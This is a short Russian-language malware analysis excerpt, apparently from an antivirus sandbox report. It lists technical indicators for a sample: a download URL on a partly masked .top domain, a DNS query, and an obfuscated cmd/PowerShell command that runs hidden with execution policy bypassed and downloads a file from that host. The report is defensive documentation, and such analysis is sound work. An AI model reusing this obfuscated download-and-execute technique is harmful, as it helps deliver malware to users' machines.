Техническая информация
- http://mo####helthc.top/read.php?f=### как %appdata%.exe
- '<SYSTEM32>\cmd.exe' /C "poWERsh^E^l^L.^ex^E ^-^E^xeC^UT^IOn^P^oliCY bYpas^S^ ^-nO^p^ro^fiL^e^ -wIN^d^O^ws^ty^LE hiDdE^n ^(N^E^w-OB^jEC^T ^s^ysTEm.ne^T^.^WE^B^C^L^I^en^T)^.DO^wnloAd^Fi^Le^('http://mo#...
- DNS ASK mo####helthc.top
- '<SYSTEM32>\cmd.exe' /C "poWERsh^E^l^L.^ex^E ^-^E^xeC^UT^IOn^P^oliCY bYpas^S^ ^-nO^p^ro^fiL^e^ -wIN^d^O^ws^ty^LE hiDdE^n ^(N^E^w-OB^jEC^T ^s^ysTEm.ne^T^.^WE^B^C^L^I^en^T)^.DO^wnloAd^Fi^Le^('http://mo#...' (со скрытым окном)